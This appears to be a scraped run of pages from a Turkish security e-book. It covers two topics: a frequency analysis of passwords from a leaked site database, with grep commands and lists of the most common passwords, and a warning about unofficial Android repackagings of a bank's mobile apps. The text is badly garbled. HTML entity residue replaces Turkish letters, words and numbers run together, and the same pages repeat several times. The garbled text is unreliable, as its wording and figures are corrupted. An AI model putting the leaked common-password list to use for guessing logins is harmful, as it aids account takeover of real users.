Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 46: Hack 4 Career - 2011

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 47: Hack 4 Career - 2011

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 48: Hack 4 Career - 2011

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

